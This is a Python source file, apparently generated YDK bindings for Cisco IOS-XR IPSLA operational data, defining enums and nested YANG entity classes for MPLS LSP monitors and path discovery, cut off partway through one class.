class IpslaLspGrpStatusEnum(Enum):
    """IpslaLspGrpStatusEnum (Enum Class).

    Ipsla lsp grp status enum. Each member maps a numeric value to its
    YANG enum identifier: unknown=1, up=2, partial=3, down=4, pending=5.
    (Note this enum is 1-based, unlike IpslaLspGrpPathStatusEnum.)
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    ipsla_lsp_grp_status_unknown = Enum.YLeaf(1, "ipsla-lsp-grp-status-unknown")

    ipsla_lsp_grp_status_up = Enum.YLeaf(2, "ipsla-lsp-grp-status-up")

    ipsla_lsp_grp_status_partial = Enum.YLeaf(3, "ipsla-lsp-grp-status-partial")

    ipsla_lsp_grp_status_down = Enum.YLeaf(4, "ipsla-lsp-grp-status-down")

    ipsla_lsp_grp_status_pending = Enum.YLeaf(5, "ipsla-lsp-grp-status-pending")
class IpslaMplsAddDeleteEnum(Enum):
    """IpslaMplsAddDeleteEnum (Enum Class).

    Ipsla mpls add delete enum: distinguishes the add queue (1) from the
    delete queue (2).
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    ipsla_mpls_add_delete_add_q = Enum.YLeaf(1, "ipsla-mpls-add-delete-add-q")

    ipsla_mpls_add_delete_delete_q = Enum.YLeaf(2, "ipsla-mpls-add-delete-delete-q")
class IpslaMplsLpdDiscoveryModeEnum(Enum):
    """IpslaMplsLpdDiscoveryModeEnum (Enum Class).

    Ipsla mpls lpd discovery mode enum: unknown=0, initial running=1,
    initial complete=2, rediscovery running=3, rediscovery complete=4.
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    ipsla_mpls_lpd_unknown = Enum.YLeaf(0, "ipsla-mpls-lpd-unknown")

    ipsla_mpls_lpd_initial_running = Enum.YLeaf(1, "ipsla-mpls-lpd-initial-running")

    ipsla_mpls_lpd_initial_complete = Enum.YLeaf(2, "ipsla-mpls-lpd-initial-complete")

    ipsla_mpls_lpd_rediscovery_running = Enum.YLeaf(3, "ipsla-mpls-lpd-rediscovery-running")

    ipsla_mpls_lpd_rediscovery_complete = Enum.YLeaf(4, "ipsla-mpls-lpd-rediscovery-complete")
class IpslaMplsLpdPathDiscoveryStatus(Enum):
    """IpslaMplsLpdPathDiscoveryStatus (Enum Class).

    Ipsla mpls lpd path discovery status: unknown=0, ok=1, broken=2,
    unexplorable=3.
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    ipsla_mpls_lpd_path_discovery_unknown = Enum.YLeaf(0, "ipsla-mpls-lpd-path-discovery-unknown")

    ipsla_mpls_lpd_path_discovery_ok = Enum.YLeaf(1, "ipsla-mpls-lpd-path-discovery-ok")

    ipsla_mpls_lpd_path_discovery_broken = Enum.YLeaf(2, "ipsla-mpls-lpd-path-discovery-broken")

    ipsla_mpls_lpd_path_discovery_unexplorable = Enum.YLeaf(3, "ipsla-mpls-lpd-path-discovery-unexplorable")
class IpslaMplsLpdRetCode(Enum):
    """IpslaMplsLpdRetCode (Enum Class).

    Ipsla mpls lpd ret code: unknown=1, no path=2, all path broken=3,
    all path unexplorable=4, all path broken or unexplorable=5,
    timeout=6, error=7, ok=8.
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    ipsla_mpls_lpd_ret_code_unknown = Enum.YLeaf(1, "ipsla-mpls-lpd-ret-code-unknown")

    ipsla_mpls_lpd_ret_code_no_path = Enum.YLeaf(2, "ipsla-mpls-lpd-ret-code-no-path")

    ipsla_mpls_lpd_ret_code_all_path_broken = Enum.YLeaf(3, "ipsla-mpls-lpd-ret-code-all-path-broken")

    ipsla_mpls_lpd_ret_code_all_path_unexplorable = Enum.YLeaf(4, "ipsla-mpls-lpd-ret-code-all-path-unexplorable")

    ipsla_mpls_lpd_ret_code_all_path_broken_or_unexplorable = Enum.YLeaf(5, "ipsla-mpls-lpd-ret-code-all-path-broken-or-unexplorable")

    ipsla_mpls_lpd_ret_code_timeout = Enum.YLeaf(6, "ipsla-mpls-lpd-ret-code-timeout")

    ipsla_mpls_lpd_ret_code_error = Enum.YLeaf(7, "ipsla-mpls-lpd-ret-code-error")

    ipsla_mpls_lpd_ret_code_ok = Enum.YLeaf(8, "ipsla-mpls-lpd-ret-code-ok")
class IpslaOperStateEnum(Enum):
    """IpslaOperStateEnum (Enum Class).

    Ipsla oper state enum: inactive=0, pending=1, active=2.
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    ipsla_oper_state_inactive = Enum.YLeaf(0, "ipsla-oper-state-inactive")

    ipsla_oper_state_pending = Enum.YLeaf(1, "ipsla-oper-state-pending")

    ipsla_oper_state_active = Enum.YLeaf(2, "ipsla-oper-state-active")
class IpslaRetCode(Enum):
    """IpslaRetCode (Enum Class).

    Ipsla ret code: the full set of IPSLA operation return codes,
    values 0 (unknown) through 49 (max). Each member name encodes its
    meaning and each value maps to the matching YANG enum identifier
    (see the assignments below for the value -> identifier pairs).
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    ipsla_ret_code_unknown = Enum.YLeaf(0, "ipsla-ret-code-unknown")

    ipsla_ret_code_ok = Enum.YLeaf(1, "ipsla-ret-code-ok")

    ipsla_ret_code_disconnect = Enum.YLeaf(2, "ipsla-ret-code-disconnect")

    ipsla_ret_code_over_threshold = Enum.YLeaf(3, "ipsla-ret-code-over-threshold")

    ipsla_ret_code_timeout = Enum.YLeaf(4, "ipsla-ret-code-timeout")

    ipsla_ret_code_busy = Enum.YLeaf(5, "ipsla-ret-code-busy")

    ipsla_ret_code_no_connection = Enum.YLeaf(6, "ipsla-ret-code-no-connection")

    ipsla_ret_code_dropped = Enum.YLeaf(7, "ipsla-ret-code-dropped")

    ipsla_ret_code_sequence_error = Enum.YLeaf(8, "ipsla-ret-code-sequence-error")

    ipsla_ret_code_verify_error = Enum.YLeaf(9, "ipsla-ret-code-verify-error")

    ipsla_ret_code_application_specific = Enum.YLeaf(10, "ipsla-ret-code-application-specific")

    ipsla_ret_code_dns_server_timeout = Enum.YLeaf(11, "ipsla-ret-code-dns-server-timeout")

    ipsla_ret_code_tcp_connect_timeout = Enum.YLeaf(12, "ipsla-ret-code-tcp-connect-timeout")

    ipsla_ret_code_http_transaction_timeout = Enum.YLeaf(13, "ipsla-ret-code-http-transaction-timeout")

    ipsla_ret_code_dns_query_error = Enum.YLeaf(14, "ipsla-ret-code-dns-query-error")

    ipsla_ret_code_http_error = Enum.YLeaf(15, "ipsla-ret-code-http-error")

    ipsla_ret_code_internal_error = Enum.YLeaf(16, "ipsla-ret-code-internal-error")

    ipsla_ret_code_mpls_lsp_echo_tx_error = Enum.YLeaf(17, "ipsla-ret-code-mpls-lsp-echo-tx-error")

    ipsla_ret_code_mpls_lsp_unreachable = Enum.YLeaf(18, "ipsla-ret-code-mpls-lsp-unreachable")

    ipsla_ret_code_mpls_lsp_malformed_request = Enum.YLeaf(19, "ipsla-ret-code-mpls-lsp-malformed-request")

    ipsla_ret_code_mpls_lsp_reachable_but_not_fec = Enum.YLeaf(20, "ipsla-ret-code-mpls-lsp-reachable-but-not-fec")

    ipsla_ret_code_mpls_lsp_ds_map_mismatch = Enum.YLeaf(21, "ipsla-ret-code-mpls-lsp-ds-map-mismatch")

    ipsla_ret_code_mpls_lsp_duplicate = Enum.YLeaf(22, "ipsla-ret-code-mpls-lsp-duplicate")

    ipsla_ret_code_failure = Enum.YLeaf(23, "ipsla-ret-code-failure")

    ipsla_ret_code_malloc_failure = Enum.YLeaf(24, "ipsla-ret-code-malloc-failure")

    ipsla_ret_code_sock_open_error = Enum.YLeaf(25, "ipsla-ret-code-sock-open-error")

    ipsla_ret_code_sock_bind_error = Enum.YLeaf(26, "ipsla-ret-code-sock-bind-error")

    ipsla_ret_code_sock_send_error = Enum.YLeaf(27, "ipsla-ret-code-sock-send-error")

    ipsla_ret_code_sock_recv_error = Enum.YLeaf(28, "ipsla-ret-code-sock-recv-error")

    ipsla_ret_code_sock_connect_error = Enum.YLeaf(29, "ipsla-ret-code-sock-connect-error")

    ipsla_ret_code_sock_set_option_error = Enum.YLeaf(30, "ipsla-ret-code-sock-set-option-error")

    ipsla_ret_code_sock_attach_error = Enum.YLeaf(31, "ipsla-ret-code-sock-attach-error")

    ipsla_ret_code_ctrl_msg_error = Enum.YLeaf(32, "ipsla-ret-code-ctrl-msg-error")

    ipsla_ret_code_no_key_chain = Enum.YLeaf(33, "ipsla-ret-code-no-key-chain")

    ipsla_ret_code_key_chain_lib_fail = Enum.YLeaf(34, "ipsla-ret-code-key-chain-lib-fail")

    ipsla_ret_code_no_key_id = Enum.YLeaf(35, "ipsla-ret-code-no-key-id")

    ipsla_ret_code_invalid_key_id = Enum.YLeaf(36, "ipsla-ret-code-invalid-key-id")

    ipsla_ret_code_entry_exist = Enum.YLeaf(37, "ipsla-ret-code-entry-exist")

    ipsla_ret_code_entry_not_found = Enum.YLeaf(38, "ipsla-ret-code-entry-not-found")

    ipsla_ret_code_hop_over_max = Enum.YLeaf(39, "ipsla-ret-code-hop-over-max")

    ipsla_ret_code_hop_dup_address = Enum.YLeaf(40, "ipsla-ret-code-hop-dup-address")

    ipsla_ret_code_vrf_name_error = Enum.YLeaf(41, "ipsla-ret-code-vrf-name-error")

    ipsla_ret_code_resp_failure = Enum.YLeaf(42, "ipsla-ret-code-resp-failure")

    ipsla_ret_code_auth_failure = Enum.YLeaf(43, "ipsla-ret-code-auth-failure")

    ipsla_ret_code_format_failure = Enum.YLeaf(44, "ipsla-ret-code-format-failure")

    ipsla_ret_code_port_in_use = Enum.YLeaf(45, "ipsla-ret-code-port-in-use")

    ipsla_ret_code_no_route = Enum.YLeaf(46, "ipsla-ret-code-no-route")

    ipsla_ret_code_pending = Enum.YLeaf(47, "ipsla-ret-code-pending")

    ipsla_ret_code_invalid_address = Enum.YLeaf(48, "ipsla-ret-code-invalid-address")

    ipsla_ret_code_max = Enum.YLeaf(49, "ipsla-ret-code-max")
class IpslaTargetTypeEnum(Enum):
    """IpslaTargetTypeEnum (Enum Class).

    IPSLA Target Types: IPv4 address=1, IPv4 prefix=2, Tunnel ID=3,
    IPv4 pseudowire=4, IPv6 address=5.
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    ipv4_address_target_type = Enum.YLeaf(1, "ipv4-address-target-type")

    ipv4_prefix_target_type = Enum.YLeaf(2, "ipv4-prefix-target-type")

    tunnel_id_target_type = Enum.YLeaf(3, "tunnel-id-target-type")

    ipv4_pseudowire_target_type = Enum.YLeaf(4, "ipv4-pseudowire-target-type")

    ipv6_address_target_type = Enum.YLeaf(5, "ipv6-address-target-type")
class OpTypeEnum(Enum):
    """OpTypeEnum (Enum Class).

    IPSLA Operation Types. Values are powers of two (1, 2, 4, 8, 16,
    32, 64, 128), i.e. bit-flag style assignments; icmp-path-jitter and
    icmp-path-echo share no value with any other member.
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    icmp_echo = Enum.YLeaf(1, "icmp-echo")

    icmp_path_jitter = Enum.YLeaf(2, "icmp-path-jitter")

    icmp_path_echo = Enum.YLeaf(4, "icmp-path-echo")

    udp_jitter = Enum.YLeaf(8, "udp-jitter")

    udp_echo = Enum.YLeaf(16, "udp-echo")

    mpls_lsp_ping = Enum.YLeaf(32, "mpls-lsp-ping")

    mpls_lsp_trace = Enum.YLeaf(64, "mpls-lsp-trace")

    mpls_lsp_group = Enum.YLeaf(128, "mpls-lsp-group")
class SlaOpTypes(Enum):
    """SlaOpTypes (Enum Class).

    IPSLA Operation Types, "oper-" prefixed variant. Same power-of-two
    values as OpTypeEnum (1..128) with different YANG identifiers.
    """

    # Each member wraps (numeric value, YANG enum literal) in a ydk YLeaf.
    oper_icmp_echo = Enum.YLeaf(1, "oper-icmp-echo")

    oper_icmp_path_jitter = Enum.YLeaf(2, "oper-icmp-path-jitter")

    oper_icmp_path_echo = Enum.YLeaf(4, "oper-icmp-path-echo")

    oper_udp_jitter = Enum.YLeaf(8, "oper-udp-jitter")

    oper_udp_echo = Enum.YLeaf(16, "oper-udp-echo")

    oper_mpls_lsp_ping = Enum.YLeaf(32, "oper-mpls-lsp-ping")

    oper_mpls_lsp_trace = Enum.YLeaf(64, "oper-mpls-lsp-trace")

    oper_mpls_lsp_group = Enum.YLeaf(128, "oper-mpls-lsp-group")
class Ipsla(Entity):
"""
IPSLA operational data
.. attribute:: mpls_data
MPLS operational data
**type**\: :py:class:`MplsData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData>`
.. attribute:: responder
Data from responder probe handling
**type**\: :py:class:`Responder <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.Responder>`
.. attribute:: operation_data
Operations data
**type**\: :py:class:`OperationData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData>`
.. attribute:: application_info
IPSLA application information
**type**\: :py:class:`ApplicationInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.ApplicationInfo>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the top-level ipsla container and its four child containers."""
    super(Ipsla, self).__init__()
    self._top_entity = None

    self.yang_name = "ipsla"
    self.yang_parent_name = "Cisco-IOS-XR-man-ipsla-oper"
    self.is_top_level_class = True
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # Map each YANG container name to (python attribute name, child class).
    self._child_container_classes = OrderedDict([("mpls-data", ("mpls_data", Ipsla.MplsData)), ("responder", ("responder", Ipsla.Responder)), ("operation-data", ("operation_data", Ipsla.OperationData)), ("application-info", ("application_info", Ipsla.ApplicationInfo))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict()  # no leaf nodes directly under the root

    # Instantiate each child container and register its YANG name.
    self.mpls_data = Ipsla.MplsData()
    self.mpls_data.parent = self
    self._children_name_map["mpls_data"] = "mpls-data"
    self._children_yang_names.add("mpls-data")

    self.responder = Ipsla.Responder()
    self.responder.parent = self
    self._children_name_map["responder"] = "responder"
    self._children_yang_names.add("responder")

    self.operation_data = Ipsla.OperationData()
    self.operation_data.parent = self
    self._children_name_map["operation_data"] = "operation-data"
    self._children_yang_names.add("operation-data")

    self.application_info = Ipsla.ApplicationInfo()
    self.application_info.parent = self
    self._children_name_map["application_info"] = "application-info"
    self._children_yang_names.add("application-info")

    # Top-level entity: segment path is the module-qualified root node.
    self._segment_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla"
class MplsData(Entity):
"""
MPLS operational data
.. attribute:: lsp_monitors
List of MPLS LSP Monitor instances
**type**\: :py:class:`LspMonitors <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors>`
.. attribute:: discovery
Provider Edge(PE) discovery operational data
**type**\: :py:class:`Discovery <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the mpls-data container with its lsp-monitors and discovery children."""
    super(Ipsla.MplsData, self).__init__()

    self.yang_name = "mpls-data"
    self.yang_parent_name = "ipsla"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # Map each YANG container name to (python attribute name, child class).
    self._child_container_classes = OrderedDict([("lsp-monitors", ("lsp_monitors", Ipsla.MplsData.LspMonitors)), ("discovery", ("discovery", Ipsla.MplsData.Discovery))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict()  # container has no direct leaves

    self.lsp_monitors = Ipsla.MplsData.LspMonitors()
    self.lsp_monitors.parent = self
    self._children_name_map["lsp_monitors"] = "lsp-monitors"
    self._children_yang_names.add("lsp-monitors")

    self.discovery = Ipsla.MplsData.Discovery()
    self.discovery.parent = self
    self._children_name_map["discovery"] = "discovery"
    self._children_yang_names.add("discovery")

    self._segment_path = lambda: "mpls-data"
    # Parent has no list ancestor, so the absolute path can be precomputed.
    self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/%s" % self._segment_path()
class LspMonitors(Entity):
"""
List of MPLS LSP Monitor instances
.. attribute:: lsp_monitor
Operational data for MPLS LSP Monitor
**type**\: list of :py:class:`LspMonitor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the lsp-monitors container holding the list of LspMonitor entries."""
    super(Ipsla.MplsData.LspMonitors, self).__init__()

    self.yang_name = "lsp-monitors"
    self.yang_parent_name = "mpls-data"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([])
    # Single YANG list child: "lsp-monitor" entries.
    self._child_list_classes = OrderedDict([("lsp-monitor", ("lsp_monitor", Ipsla.MplsData.LspMonitors.LspMonitor))])
    self._leafs = OrderedDict()  # container has no direct leaves

    self.lsp_monitor = YList(self)
    self._segment_path = lambda: "lsp-monitors"
    self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/%s" % self._segment_path()

def __setattr__(self, name, value):
    # Route attribute writes through ydk so list/leaf metadata stays consistent.
    self._perform_setattr(Ipsla.MplsData.LspMonitors, [], name, value)
class LspMonitor(Entity):
"""
Operational data for MPLS LSP Monitor
.. attribute:: monitor_id (key)
Monitor ID
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: state
Operational state of MPLS LSP Monitor
**type**\: :py:class:`State <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.State>`
.. attribute:: operations
List of operations in MPLS LSP Monitor
**type**\: :py:class:`Operations <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations>`
.. attribute:: scan_queues
List of Scan Queue entries in MPLS LSP Monitor
**type**\: :py:class:`ScanQueues <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build one lsp-monitor list entry, keyed by monitor-id (int32)."""
    super(Ipsla.MplsData.LspMonitors.LspMonitor, self).__init__()

    self.yang_name = "lsp-monitor"
    self.yang_parent_name = "lsp-monitors"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    # monitor_id is the YANG list key for this entry.
    self.ylist_key_names = ['monitor_id']
    self._child_container_classes = OrderedDict([("state", ("state", Ipsla.MplsData.LspMonitors.LspMonitor.State)), ("operations", ("operations", Ipsla.MplsData.LspMonitors.LspMonitor.Operations)), ("scan-queues", ("scan_queues", Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict([
        ('monitor_id', YLeaf(YType.int32, 'monitor-id')),
    ])
    self.monitor_id = None

    self.state = Ipsla.MplsData.LspMonitors.LspMonitor.State()
    self.state.parent = self
    self._children_name_map["state"] = "state"
    self._children_yang_names.add("state")

    self.operations = Ipsla.MplsData.LspMonitors.LspMonitor.Operations()
    self.operations.parent = self
    self._children_name_map["operations"] = "operations"
    self._children_yang_names.add("operations")

    self.scan_queues = Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues()
    self.scan_queues.parent = self
    self._children_name_map["scan_queues"] = "scan-queues"
    self._children_yang_names.add("scan-queues")

    # Segment path embeds the current key value, so it must stay a lambda.
    self._segment_path = lambda: "lsp-monitor" + "[monitor-id='" + str(self.monitor_id) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/lsp-monitors/%s" % self._segment_path()

def __setattr__(self, name, value):
    # monitor_id is listed so ydk treats it as a key leaf during writes.
    self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor, ['monitor_id'], name, value)
class State(Entity):
    """
    Operational state of MPLS LSP Monitor.

    All four leaves are uint32 counters in seconds; per the YANG model
    description, the sentinel 0xffffffff means the corresponding timer
    is not running (or, for lpd_compeletion_time, that LPD has never
    completed).

    .. attribute:: scan_remaining
        Seconds left before next scan for addition.
    .. attribute:: delete_scan_remaining
        Seconds left before next scan for deletion.
    .. attribute:: rediscovery_remaining
        Seconds left before next path discovery.
    .. attribute:: lpd_compeletion_time
        LPD completion time for the entire set of PEs discovered in this
        MPLSLM instance. (NOTE: the 'compeletion' spelling comes from
        the YANG leaf name and must not be corrected here.)
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.MplsData.LspMonitors.LspMonitor.State, self).__init__()

        self.yang_name = "state"
        self.yang_parent_name = "lsp-monitor"
        self.is_top_level_class = False
        # Ancestor LspMonitor is a keyed list, so absolute path is dynamic.
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('scan_remaining', YLeaf(YType.uint32, 'scan-remaining')),
            ('delete_scan_remaining', YLeaf(YType.uint32, 'delete-scan-remaining')),
            ('rediscovery_remaining', YLeaf(YType.uint32, 'rediscovery-remaining')),
            ('lpd_compeletion_time', YLeaf(YType.uint32, 'lpd-compeletion-time')),
        ])
        self.scan_remaining = None
        self.delete_scan_remaining = None
        self.rediscovery_remaining = None
        self.lpd_compeletion_time = None
        self._segment_path = lambda: "state"

    def __setattr__(self, name, value):
        # All four leaves are writable non-key leaves.
        self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.State, ['scan_remaining', 'delete_scan_remaining', 'rediscovery_remaining', 'lpd_compeletion_time'], name, value)
class Operations(Entity):
"""
List of operations in MPLS LSP Monitor
.. attribute:: operation_
Operation created in MPLS LSP Monitor
**type**\: list of :py:class:`Operation <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the operations container holding the list of Operation entries."""
    super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations, self).__init__()

    self.yang_name = "operations"
    self.yang_parent_name = "lsp-monitor"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([])
    # YANG list "operation" maps to python attribute "operation_"
    # (trailing underscore avoids clashing with other generated names).
    self._child_list_classes = OrderedDict([("operation", ("operation_", Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation))])
    self._leafs = OrderedDict()  # container has no direct leaves

    self.operation_ = YList(self)
    self._segment_path = lambda: "operations"

def __setattr__(self, name, value):
    # Route attribute writes through ydk so list metadata stays consistent.
    self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations, [], name, value)
class Operation(Entity):
"""
Operation created in MPLS LSP Monitor
.. attribute:: operation_id (key)
Operation ID
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: state
Operational state of the created operation
**type**\: :py:class:`State <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.State>`
.. attribute:: lpd_paths
List of LPD paths in MPLS LPD group operation
**type**\: :py:class:`LpdPaths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build one operation list entry, keyed by operation-id (int32)."""
    super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation, self).__init__()

    self.yang_name = "operation"
    self.yang_parent_name = "operations"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # operation_id is the YANG list key for this entry.
    self.ylist_key_names = ['operation_id']
    self._child_container_classes = OrderedDict([("state", ("state", Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.State)), ("lpd-paths", ("lpd_paths", Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict([
        ('operation_id', YLeaf(YType.int32, 'operation-id')),
    ])
    self.operation_id = None

    self.state = Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.State()
    self.state.parent = self
    self._children_name_map["state"] = "state"
    self._children_yang_names.add("state")

    self.lpd_paths = Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths()
    self.lpd_paths.parent = self
    self._children_name_map["lpd_paths"] = "lpd-paths"
    self._children_yang_names.add("lpd-paths")

    # Segment path embeds the current key value, so it must stay a lambda.
    self._segment_path = lambda: "operation" + "[operation-id='" + str(self.operation_id) + "']"

def __setattr__(self, name, value):
    # operation_id is listed so ydk treats it as a key leaf during writes.
    self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation, ['operation_id'], name, value)
class State(Entity):
    """
    Operational state of the created operation.

    .. attribute:: target_address
        PE target address (IPv4 dotted-quad string per the YANG pattern).
    .. attribute:: target_mask
        PE target mask length (uint32).
    .. attribute:: group_status
        Latest LSP group status; an IpslaLspGrpStatusEnum enumeration leaf.
    .. attribute:: operation_time
        Latest operation time (uint64).
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.State, self).__init__()

        self.yang_name = "state"
        self.yang_parent_name = "operation"
        self.is_top_level_class = False
        # Ancestor Operation is a keyed list, so absolute path is dynamic.
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('target_address', YLeaf(YType.str, 'target-address')),
            ('target_mask', YLeaf(YType.uint32, 'target-mask')),
            ('group_status', YLeaf(YType.enumeration, 'group-status')),
            ('operation_time', YLeaf(YType.uint64, 'operation-time')),
        ])
        self.target_address = None
        self.target_mask = None
        self.group_status = None
        self.operation_time = None
        self._segment_path = lambda: "state"

    def __setattr__(self, name, value):
        # All four leaves are writable non-key leaves.
        self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.State, ['target_address', 'target_mask', 'group_status', 'operation_time'], name, value)
class LpdPaths(Entity):
    """
    List of LPD paths in MPLS LPD group
    operation
    .. attribute:: lpd_path
    Operational state of LPD path in MPLS LSP Group operation
    **type**\: list of :py:class:`LpdPath <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath>`
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Register the 'lpd-path' child list; this container has no leafs of its own."""
        super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths, self).__init__()
        self.yang_name = "lpd-paths"
        self.yang_parent_name = "operation"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([("lpd-path", ("lpd_path", Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath))])
        self._leafs = OrderedDict()
        # YList holds zero or more LpdPath entries keyed by their path-index.
        self.lpd_path = YList(self)
        self._segment_path = lambda: "lpd-paths"

    def __setattr__(self, name, value):
        """Delegate attribute writes to the YDK base machinery (no leafs here)."""
        self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths, [], name, value)

    class LpdPath(Entity):
        """
        Operational state of LPD path in MPLS LSP
        Group operation
        .. attribute:: path_index (key)
        LPD path index
        **type**\: int
        **range:** \-2147483648..2147483647
        .. attribute:: path_id
        LPD path identifier
        **type**\: :py:class:`PathId <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath.PathId>`
        .. attribute:: path_status
        Latest path status
        **type**\: :py:class:`IpslaLspGrpPathStatusEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaLspGrpPathStatusEnum>`
        .. attribute:: operation_time
        Latest operation time
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: response_time
        Latest RTT
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: success_count
        Number of path successes
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: failure_count
        Number of path failures
        **type**\: int
        **range:** 0..4294967295
        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            """Build this 'lpd-path' list entry: key leaf, stats leafs, and the path-id child."""
            super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath, self).__init__()
            self.yang_name = "lpd-path"
            self.yang_parent_name = "lpd-paths"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            # 'path_index' is the YANG list key for this entry.
            self.ylist_key_names = ['path_index']
            self._child_container_classes = OrderedDict([("path-id", ("path_id", Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath.PathId))])
            self._child_list_classes = OrderedDict([])
            # Leaf descriptors: python attribute name -> YLeaf(yang type, yang name).
            self._leafs = OrderedDict([
                ('path_index', YLeaf(YType.int32, 'path-index')),
                ('path_status', YLeaf(YType.enumeration, 'path-status')),
